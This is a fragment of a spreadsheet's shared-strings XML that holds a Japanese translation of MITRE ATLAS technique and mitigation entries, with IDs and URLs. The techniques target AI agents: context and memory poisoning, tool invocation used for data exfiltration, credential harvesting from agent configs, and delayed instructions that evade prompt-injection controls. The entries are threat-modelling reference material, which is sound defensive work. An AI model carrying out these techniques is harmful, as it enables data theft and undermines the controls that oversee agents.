    <rPh sb="101" eb="103">
      <t>キオク</t>
    </rPh>
    <rPh sb="137" eb="139">
      <t>キオク</t>
    </rPh>
    <rPh sb="157" eb="159">
      <t>キオク</t>
    </rPh>
    <rPh sb="168" eb="170">
      <t>キオク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AML.M0026</t>
  </si>
  <si>
    <t>course-of-action--08ed40a8-34fb-59c1-a889-c4dafa4bc134</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0026</t>
  </si>
  <si>
    <t>AML.M0030</t>
  </si>
  <si>
    <t>course-of-action--ca58e864-8980-5b45-a405-093d6803ad97</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0030</t>
  </si>
  <si>
    <t>AML.M0027</t>
  </si>
  <si>
    <t>course-of-action--5537712b-0001-5d3a-b12f-041d78a837a7</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0027</t>
  </si>
  <si>
    <t>AML.M0028</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AML.M0029</t>
  </si>
  <si>
    <t>course-of-action--215593c6-9371-51f0-997a-9080c6786b2a</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/mitigations/AML.M0029</t>
  </si>
  <si>
    <t>バックドア トリガーや敵対的影響をテストして、AI モデルが意図したとおりに機能することを検証します。モデルの概念ドリフトと学習データ ドリフト（これらはデータの改ざんや汚染を示す可能性があります）を監視します。</t>
    <rPh sb="14" eb="16">
      <t>エイキョウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>特権 AI エージェントの権限設定</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AI エージェントのアクションに対する人間の関与</t>
    <rPh sb="16" eb="17">
      <t>タイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>信頼できないデータでの AI エージェントのツールの呼び出し制限</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>シングル ユーザー AI エージェントの権限設定</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>複数の AI エージェント間で共有されるツールを導入する場合、ツールの権限に関する堅牢なポリシーと管理策を実装することが重要です。これらの管理策には、最小権限の原則と委任アクセスの適用が含まれます。委任アクセスでは、ツールは、呼び出し元の AI エージェントの権限、ID、および制限を受け取ります。これらの設定は、エージェントとツールを接続する MCP サーバーに実装することも、より複雑な場合にはツールの設定ファイルに直接実装することもできます。</t>
    <rPh sb="49" eb="52">
      <t>カンリサク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>ユーザーの代理として行動する AI エージェントを導入する場合、エージェントの権限とライフサイクル管理に関する堅牢なポリシーと管理策を実装することが重要です。ライフサイクル管理には、アイデンティティの確立、アクセス管理用のプロトコル、そして役割が不要になったエージェントの廃止が含まれます。また、管理策には、最小権限の原則とユーザー アカウントからの委任アクセスも含まれます。ユーザーの代理として行動する場合、AI エージェントには、システムまたは組織内でユーザーに付与されない権限を付与してはなりません。</t>
    <rPh sb="63" eb="66">
      <t>カンリサク</t>
    </rPh>
    <rPh sb="109" eb="110">
      <t>ヨウ</t>
    </rPh>
    <rPh sb="148" eb="151">
      <t>カンリサク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>適切なライブラリ読み込み機構を構成し、潜在的に脆弱なソフトウェアを調査することで、オペレーティング システムとソフトウェアのライブラリー読み込み機構が悪用されることや信頼できないコードが読み込まれることを防ぎます。
pickle ファイルなど機械学習モデルを保存するために一般的に使用されるファイル形式には、悪意のあるライブラリを読み込むエクスプロイトが含まれている可能性があります</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>信頼できないデータには、AI エージェントのツールを呼び出すプロンプト インジェクションが含まれる可能性があり、機密性、完全性、または可用性の侵害を引き起こす可能性があります。信頼できないデータが LLM のコンテキストに入る場合は、ツールの呼び出しを制限または制限することを推奨します。
ツールの呼び出しを制限する程度は、アクションの潜在的な結果によって異なります。信頼できないデータが LLM のコンテキストに入った場合は、ツールの自動呼び出しをブロックするか、ユーザーの確認を求めることを検討します。重大な影響を伴うアクションの場合は、常にユーザーの確認を求めることを検討します。</t>
    <rPh sb="138" eb="140">
      <t>スイショウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AI エージェントには、必要なワークフローを実行するために、通常のユーザーよりも高い権限が付与される場合があります。特権 AI エージェント、または複数のユーザーと対話するエージェントを導入する場合、特権エージェントの権限に関する堅牢なポリシーと管理策を実装することが重要です。これらの管理策には、ロールベースのアクセス制御（RBAC）、属性ベースのアクセス制御（ABAC）、そして最小権限の原則が含まれます。これにより、エージェントには、指定されたタスクを実行するために必要なツールとリソースへのアクセス権限のみが付与されます。</t>
    <rPh sb="123" eb="126">
      <t>カンリサク</t>
    </rPh>
    <rPh sb="143" eb="146">
      <t>カンリサク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>システムは、AI エージェントがアクションを実行する前に、ユーザーまたはその他のステークホルダーによる承認を求める必要があります。承認者は、ユース ケースに応じて技術スタッフまたは事業部門の SME (Subject Matter Expert) となる場合があります。専用の監査エージェントなどのツールは、人間による承認を支援する場合がありますが、最終的な判断は人間の意思決定者によって行われる必要があります。
人間が関与するポリシーによるセキュリティ上のメリットは、追加の承認にかかる運用上のオーバーヘッド コストと相反する場合があります。これを軽減するために、人間が関与するポリシーは、対象となるタスクの影響の程度に応じて設定する必要があります。基本的なツールにアクセスするエージェントが実行する軽微で反復的なタスクでは、最小限の人間による監視で済む場合がありますが、重大な影響を伴うシステムで稼働するエージェントでは、複数の組織にまたがる複数のステークホルダーからの承認が必要になる場合があります。</t>
    <rPh sb="276" eb="278">
      <t>ケイゲン</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AML.T0080</t>
  </si>
  <si>
    <t>attack-pattern--785ca1b4-7d17-51f1-a605-46a9f21fb9b0</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0080</t>
  </si>
  <si>
    <t>attack-pattern--b23b5475-a05e-5b4a-8e9f-8c758dd0cda8</t>
  </si>
  <si>
    <t>AML.T0085.001</t>
  </si>
  <si>
    <t>attack-pattern--bfa79523-214f-57f5-a445-c8a563f141f5</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0085.001</t>
  </si>
  <si>
    <t>敵対者は、作戦全体で使用するインフラストラクチャを購入、リース、またはレンタルする可能性があります。敵対者の作戦をホストおよびオーケストレーションするためのインフラストラクチャは多種多様です。インフラストラクチャ ソリューションには、物理​​サーバーまたはクラウド サーバー、ドメイン、モバイル デバイス、サード パーティの Web サービスが含まれます。無料のリソースも使用できますが、通常は制限があります。インフラには、AI コンポーネントやセンサーの性能を低下させたり妨害したりする対抗手段（印刷物、ウェアラブルデバイス、偽装装置など）といった物理的なコンポーネントも含まれます。
これらのインフラストラクチャ ソリューションを使用すると、敵対者は作戦を準備、開始、実行できます。ソリューションは、サード パーティの Web サービスへの接続など、通常と見なされるトラフィックに敵対者の作戦を溶け込ませるのに役立つ場合があります。実装によっては、敵対者は物理的に自身に結び付けるのが難しいインフラストラクチャを使用するだけでなく、迅速にプロビジョニング、変更、シャットダウンできるインフラストラクチャを利用することもあります。</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AML.T0084.002</t>
  </si>
  <si>
    <t>attack-pattern--9b9a3289-1c15-5719-9501-707bac954fee</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0084.002</t>
  </si>
  <si>
    <t>AML.T0091.000</t>
  </si>
  <si>
    <t>attack-pattern--7c36d546-bb69-5a52-a1ac-6d52cb10fc48</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0091.000</t>
  </si>
  <si>
    <t>AML.T0085</t>
  </si>
  <si>
    <t>attack-pattern--536e5c26-d36d-583d-a441-bc259d170fab</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0085</t>
  </si>
  <si>
    <t>AML.T0083</t>
  </si>
  <si>
    <t>attack-pattern--7d34fce6-1c7e-542d-9218-05a4bb7b0826</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0083</t>
  </si>
  <si>
    <t>AML.T0094</t>
  </si>
  <si>
    <t>attack-pattern--ced5d1be-a572-58e3-bb3f-9f8c22de02b5</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0094</t>
  </si>
  <si>
    <t>AML.T0084</t>
  </si>
  <si>
    <t>attack-pattern--e896e539-86bb-502e-8aa5-dd9630fe8337</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0084</t>
  </si>
  <si>
    <t>AML.T0084.000</t>
  </si>
  <si>
    <t>attack-pattern--491c911b-3ae5-5c7c-b81c-4fc2aceaa3a2</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0084.000</t>
  </si>
  <si>
    <t>AML.T0086</t>
  </si>
  <si>
    <t>attack-pattern--66188cfa-76df-546b-be79-aa06debc8d79</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0086</t>
  </si>
  <si>
    <t>AML.T0087</t>
  </si>
  <si>
    <t>AML.T0088</t>
  </si>
  <si>
    <t>attack-pattern--c9f8f4b0-e377-55b1-bad3-aa5f13389216</t>
  </si>
  <si>
    <t>attack-pattern--fa9aa1b8-8084-569e-9253-232b0fa8d107</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0087</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0088</t>
  </si>
  <si>
    <t>AML.T0092</t>
  </si>
  <si>
    <t>attack-pattern--b8baf5c1-606b-5fb0-8dff-a360462eccf6</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0092</t>
  </si>
  <si>
    <t>AML.T0080.000</t>
  </si>
  <si>
    <t>attack-pattern--3e837ada-a07a-5891-b801-0c75c0ffbe80</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0080.000</t>
  </si>
  <si>
    <t>AML.T0081</t>
  </si>
  <si>
    <t>attack-pattern--8a6e541e-b33f-522f-8f57-f83fd33902ea</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0081</t>
  </si>
  <si>
    <t>AML.T0090</t>
  </si>
  <si>
    <t>attack-pattern--a3c78531-c795-507b-8cfd-4ad6ed57d217</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0090</t>
  </si>
  <si>
    <t>AML.T0089</t>
  </si>
  <si>
    <t>attack-pattern--a48cde58-6c7d-5126-98b3-edc24f83b49b</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0089</t>
  </si>
  <si>
    <t>AML.T0093</t>
  </si>
  <si>
    <t>attack-pattern--8f32b668-8420-5569-bbbe-f39c6b493aff</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0093</t>
  </si>
  <si>
    <t>Initial Access, Persistence</t>
  </si>
  <si>
    <t>AML.T0082</t>
  </si>
  <si>
    <t>attack-pattern--050087b9-3411-5fbf-ba6a-74c910c6ad86</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0082</t>
  </si>
  <si>
    <t>AML.T0085.000</t>
  </si>
  <si>
    <t>attack-pattern--ba288685-9038-5a8d-99b2-ae738e39e825</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0085.000</t>
  </si>
  <si>
    <t>AML.T0095</t>
  </si>
  <si>
    <t>attack-pattern--f36ec430-2908-5472-b19a-6e89409739dd</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0095</t>
  </si>
  <si>
    <t>AML.T0080.001</t>
  </si>
  <si>
    <t>attack-pattern--6497a349-9403-5b0b-91ee-22537d783bd4</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0080.001</t>
  </si>
  <si>
    <t>AML.T0084.001</t>
  </si>
  <si>
    <t>attack-pattern--c97ec0eb-db08-5787-89a0-0c8fc9462a83</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0084.001</t>
  </si>
  <si>
    <t>AML.T0051.002</t>
  </si>
  <si>
    <t>attack-pattern--8932f230-c3b0-57eb-b6ad-0c21927963a8</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0051.002</t>
  </si>
  <si>
    <t>AML.T0091</t>
  </si>
  <si>
    <t>attack-pattern--dcbb91c4-3fcc-5c1b-b851-795600618124</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0091</t>
  </si>
  <si>
    <t>AI エージェントのコンテキストの汚染</t>
    <rPh sb="17" eb="19">
      <t>オセン</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AI エージェントのツールの起動</t>
    <rPh sb="14" eb="16">
      <t>キドウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AI エージェントのツール</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AI エージェントの設定からの資格情報</t>
    <rPh sb="10" eb="12">
      <t>セッテイ</t>
    </rPh>
    <rPh sb="15" eb="17">
      <t>シカク</t>
    </rPh>
    <rPh sb="17" eb="19">
      <t>ジョウホウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AI サービスからのデータ</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>LLM への指示の遅延実行</t>
    <rPh sb="6" eb="8">
      <t>シジ</t>
    </rPh>
    <rPh sb="9" eb="11">
      <t>チエン</t>
    </rPh>
    <rPh sb="11" eb="13">
      <t>ジッコウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AI エージェントの設定の探索</t>
    <rPh sb="10" eb="12">
      <t>セッテイ</t>
    </rPh>
    <rPh sb="13" eb="15">
      <t>タンサク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は AI 環境内を移動しようとします。
水平展開とは、攻撃者が環境内の他のシステムやコンポーネントにアクセスし、制御するために使用する可能性のある手法です。攻撃者は、モデル レジストリ、実験トラッカー、ベクトル データベース、ノートブック、学習パイプラインなどの AI Ops インフラストラクチャに狙いを定める可能性があります。攻撃者は環境内を移動する中で、AI 関連のツール、サービス、アプリケーションにアクセスする手段を発見する可能性があります。AI エージェントは、システム上の標準ユーザーアカウントよりも多くの権限を持つことが多いため、貴重な標的となる可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="24" eb="26">
      <t>スイヘイ</t>
    </rPh>
    <rPh sb="26" eb="28">
      <t>テンカイ</t>
    </rPh>
    <rPh sb="124" eb="126">
      <t>ガクシュウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>組込み知識</t>
    <rPh sb="3" eb="5">
      <t>チシキ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、特定のエージェントがアクセスできるデータ ソースを発見しようとする可能性があります。AI エージェントの設定によって、データ ソースや知識が明らかになる場合があります。
組込み知識には、知的財産、顧客データ、社内ポリシー、さらには資格情報といった機密情報や独自仕様の情報が含まれる場合があります。エージェントがアクセスできる知識をマッピングすることで、敵対者は AI エージェントの役割をより深く理解し、機密情報を漏洩させたり、さらなる悪用のための価値の高い標的を特定したりする可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="91" eb="93">
      <t>クミコ</t>
    </rPh>
    <rPh sb="182" eb="184">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="235" eb="237">
      <t>ヒョウテキ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AI エージェントのツールの起動による流出</t>
    <rPh sb="19" eb="21">
      <t>リュウシュツ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>被害者のアイデンティティー情報の収集</t>
    <rPh sb="0" eb="3">
      <t>ヒガイシャ</t>
    </rPh>
    <rPh sb="13" eb="15">
      <t>ジョウホウ</t>
    </rPh>
    <rPh sb="16" eb="18">
      <t>シュウシュウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>ディープフェイクの生成</t>
    <rPh sb="9" eb="11">
      <t>セイセイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>ユーザーの LLM チャット履歴の操作</t>
    <rPh sb="14" eb="16">
      <t>リレキ</t>
    </rPh>
    <rPh sb="17" eb="19">
      <t>ソウサ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>記憶</t>
    <rPh sb="0" eb="2">
      <t>キオク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>AI エージェントの設定の改変</t>
    <rPh sb="10" eb="12">
      <t>セッテイ</t>
    </rPh>
    <rPh sb="13" eb="15">
      <t>カイヘン</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>OS 資格情報の出力</t>
    <rPh sb="3" eb="5">
      <t>シカク</t>
    </rPh>
    <rPh sb="5" eb="7">
      <t>ジョウホウ</t>
    </rPh>
    <rPh sb="8" eb="10">
      <t>シュツリョク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>プロセスの探索</t>
    <rPh sb="5" eb="7">
      <t>タンサク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>RAG 資格情報のハーベスティング</t>
    <rPh sb="4" eb="6">
      <t>シカク</t>
    </rPh>
    <rPh sb="6" eb="8">
      <t>ジョウホウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>RAG データベース</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>公開 Web サイト/ドメインの検索</t>
    <rPh sb="0" eb="2">
      <t>コウカイ</t>
    </rPh>
    <rPh sb="16" eb="18">
      <t>ケンサク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>スレッド</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>ツールの定義</t>
    <rPh sb="4" eb="6">
      <t>テイギ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>代替認証情報の使用</t>
    <rPh sb="0" eb="2">
      <t>ダイタイ</t>
    </rPh>
    <rPh sb="2" eb="4">
      <t>ニンショウ</t>
    </rPh>
    <rPh sb="4" eb="6">
      <t>ジョウホウ</t>
    </rPh>
    <rPh sb="7" eb="9">
      <t>シヨウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、パスワード ハッシュ、Kerberos チケット、アプリケーション アクセス トークンなどの代替認証情報を使用して、環境内を水平展開し、通常のシステム アクセス制御を回避する可能性があります。
AI サービスは、ユーザーがクエリを実行するための主要な手段として代替認証情報を使用することが多いため、この手法に対して脆弱です。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="67" eb="69">
      <t>スイヘイ</t>
    </rPh>
    <rPh sb="69" eb="71">
      <t>テンカイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>アプリケーション アクセス トークン</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、アクセスを取得した後、システム上で実行されているクラウド サービスを列挙しようとする可能性があります。これらの方法は、PaaS（Platform-as-a-Service）、IaaS（Infrastructure-as-a-Service）、SaaS（Software-as-a-Service）など、多岐にわたります。様々なクラウド プロバイダーには多くのサービスが存在し、継続的インテグレーションと継続的デリバリー（CI/CD）、Lambda Functions、Entra ID などが含まれます。また、AWS GuardDuty や Microsoft Defender for Cloud などのセキュリティ サービス、AWS CloudTrail や Google Cloud Audit Logs などのログ サービスも含まれる場合があります。
敵対者は、環境全体で有効化されているサービスに関する情報の発見を試みる場合があります。Microsoft Graph API や Azure Resource Manager API などの Azure ツールと API は、アプリケーション、管理グループ、リソースとポリシー定義、そして ID でアクセスできるそれらの関係など、リソースとサービスを列挙できます。[1][2]
例えば、Stormspotter は Azure のリソースとサービスを列挙してグラフを作成するオープンソース ツールであり、Pacu はクラウド サービスを発見するための複数の手法をサポートする AWS エクスプロイトに関するオープンソース フレームワークです。[3][4]
敵対者は、取得した情報を利用して、列挙されたサービスからデータや認証情報を標的にしたり、ツールの無効化または変更、あるいはクラウド ログの無効化または変更によって特定された防御を回避したりするなど、後続の行動を形成する可能性があります。</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、AI エージェントの大規模言語モデル（LLM）が使用するコンテキストを操作し、生成する応答や実行するアクションに影響を与えようとする可能性があります。これにより、敵対者は標的のエージェントの行動を永続的に変更し、目的を達成することができます。
コンテキスト汚染は、LLM に命令や設定を記憶に追加させることによって（[記憶](/techniques/AML.T0080.000) を参照）、または単にスレッド内の以前のメッセージをコンテキストの一部として使用するように LLM に指示することによって実現されます（[スレッド](/techniques/AML.T0080.001) を参照）。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="86" eb="88">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="134" eb="136">
      <t>オセン</t>
    </rPh>
    <rPh sb="149" eb="151">
      <t>キオク</t>
    </rPh>
    <rPh sb="165" eb="167">
      <t>キオク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、AI エージェントへのアクセスを利用して、エージェントがアクセスできるツールを呼び出す可能性があります。LLM は、多くの場合、ツールを介して他のサービスやリソースに接続することで、その機能を拡張します。ツールには、他のアプリケーションとの統合、公開または非公開のデータ ソースへのアクセス、コード実行機能などが含まれる場合があります。
これにより、敵対者は、統合されたアプリケーションやサービスへの API 呼び出しを実行できるようになり、システム上での権限が強化される可能性があります。敵対者は、接続されたデータ ソースを利用して機密情報を取得する可能性があります。また、コマンドまたはスクリプト インタープリターと統合された LLM を使用して、任意の命令を実行する可能性もあります。
AI エージェントは、ユーザーが直接アクセスできないツールにアクセスできるように設定されている場合があります。敵対者は、これを悪用し、本来は使用できないツールにアクセスする可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="181" eb="183">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="251" eb="253">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="408" eb="410">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、AI サービスにエージェントがアクセスできる様々なツールを呼び出すよう指示する可能性があります。ツールは、組織内の様々な API やサービスからデータを取得する可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>起動トリガー</t>
    <rPh sb="0" eb="2">
      <t>キドウ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、エージェントを起動し、追加のアクションを実行させるキーワードやその他のトリガー（受信メール、追加されるドキュメント、受信メッセージ、その他のワークフローなど）を探索する可能性があります。
これらのトリガーを理解することで、AI エージェントの起動方法や、制御方法が明らかになります。また、敵対者が環境外からエージェントを起動させ、意図しないアクションや悪意のあるアクションを実行させようとする可能性があるため、新たな侵害経路が明らかになる可能性もあります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="85" eb="87">
      <t>タンサク</t>
    </rPh>
    <rPh sb="127" eb="129">
      <t>キドウ</t>
    </rPh>
    <rPh sb="129" eb="131">
      <t>ホウホウ</t>
    </rPh>
    <rPh sb="135" eb="137">
      <t>ホウホウ</t>
    </rPh>
    <rPh sb="150" eb="152">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、独自の敵対的攻撃を開発する可能性があります。敵対者は、既存のライブラリを出発点として活用する可能性があります（[AI への敵対的攻撃の実装](/techniques/AML.T0016.000)）。敵対者は、公開されている研究論文に掲載されているアイデアを実装したり、被害者のモデル用にカスタム メイドした攻撃を開発したりする可能性があります。</t>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、窃取したアプリケーション アクセス トークンを使用して、一般的な認証プロセスを回避し、リモート システム上の制限されたアカウント、情報、またはサービスにアクセスする可能性があります。これらのトークンは通常、ユーザーまたはサービスから窃取され、ログイン認証情報の代わりに使用されます。
アプリケーション アクセス トークンは、ユーザーまたはサービスに代わって認可済み API へのリクエストを実行するために使用され、クラウド、コンテナ ベースのアプリケーション、および SaaS（Software as a Service）内のリソースへのアクセスによく使用されます。チャットボット、LLM、予測推論 API などの AI サービスでもよく使用されます。</t>
    <rPh sb="5" eb="7">
      <t>セッシュ</t>
    </rPh>
    <rPh sb="121" eb="123">
      <t>セッシュ</t>
    </rPh>
    <rPh sb="184" eb="187">
      <t>ニンカズ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、AI エージェントの設定から、システム上の他のツールやサービスの資格情報にアクセスする可能性があります。
AI エージェントは、データベースへのクエリ、API の呼び出し、クラウド リソースとのやり取りなど、外部ツールやサービスを利用してアクションを実行することがよくあります。これらの機能を有効にするために、API キー、トークン、接続文字列などの資格情報は、多くの場合、設定ファイルに保存されます。専用のシークレット マネージャーや暗号化保管庫など、これらの資格情報を保存・管理するためのセキュアな方法もありますが、実際には、利便性や導入の容易さから、保護の低い場所に配置されることがよくあります。敵対者がこれらの設定を読み取ったり抽出したりできれば、エージェント自体の外部にある機密システムに直接アクセスできる有効な資格情報を入手できてしまう可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="227" eb="230">
      <t>ホカンコ</t>
    </rPh>
    <rPh sb="307" eb="309">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、標的組織の AI 対応サービスへのアクセスを利用して、独自の情報や機密情報を収集する可能性があります。組織が、ツールを介して検索拡張生成（RAG）データベースやその他のデータ ソースにアクセスできるチャット エージェントなど、組織のデータにアクセスするための集中型サービスに生成 AI を導入するにつれて、敵対者にとってますます魅力的な標的になります。
AI エージェントは、ユーザーが直接アクセスできないツールやデータ ソースにアクセスできるように設定されている場合があります。敵対者は、これを悪用し、一般ユーザーが直接アクセスできないデータを収集する可能性があります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="158" eb="160">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="246" eb="248">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、特定のキーワードや次のインタラクションなど、将来のイベントに応じて AI システムが実行する指示を AI システムに組み込むことで、検出を回避したり、AI システムに設定された管理策を回避したりする可能性があります。
例えば、敵対者は、プロンプトの一部として「ユーザーが新しいリクエストを送信した場合…」という文言に続いて、悪意のある指示を組み込む可能性があります。
AI エージェントには、信頼できないデータがコンテキストに含まれる会話ターン中に、特定のツールの呼び出しや特定のデータ ソースへのアクセスを阻止するプロンプト インジェクション対策を組み込むことができます。将来のインタラクションやキーワードへの指示の実行を遅延させることは、敵対者がこの種類の管理策を回避する方法の一つです。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="93" eb="96">
      <t>カンリサク</t>
    </rPh>
    <rPh sb="119" eb="121">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="319" eb="321">
      <t>チエン</t>
    </rPh>
    <rPh sb="328" eb="330">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="334" eb="336">
      <t>シュルイ</t>
    </rPh>
    <rPh sb="337" eb="340">
      <t>カンリサク</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、被害者のシステムに存在する AI エージェントの設定情報を入手しようとする可能性があります。エージェントの設定には、敵対者がアクセスできるツールやサービスが含まれる場合があります。
敵対者は、エージェントの設定ダッシュボードや設定ファイルに直接アクセスする可能性があります。また、「どのようなツールにアクセスできますか？」といった質問をエージェントに投げかけることで、設定の詳細を入手する可能性もあります。
敵対者は、AI エージェントについて入手した情報を標的の特定に役立てることができます。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="29" eb="31">
      <t>セッテイ</t>
    </rPh>
    <rPh sb="58" eb="60">
      <t>セッテイ</t>
    </rPh>
    <rPh sb="63" eb="65">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="97" eb="99">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="109" eb="111">
      <t>セッテイ</t>
    </rPh>
    <rPh sb="119" eb="121">
      <t>セッテイ</t>
    </rPh>
    <rPh sb="190" eb="192">
      <t>セッテイ</t>
    </rPh>
    <rPh sb="211" eb="213">
      <t>テキタイ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
    <t>敵対者は、プロンプトを利用して、書き込み操作を実行できるエージェントのツールを起動し、データを盗み出す可能性があります。機密情報はツールの入力パラメータにエンコードされ、一見正当なアクションの一部として送信される可能性があります。そのバリエーションには、メールの送信、文書の作成または変更、CRM レコードの更新、さらには画像や動画などのメディアの生成などがあります。</t>
    <rPh sb="0" eb="2">
      <t>テキタイ</t>
    </rPh>
    <rPh sb="134" eb="136">
      <t>ブンショ</t>
    </rPh>
    <phoneticPr fontId="11"/>
  </si>
  <si>
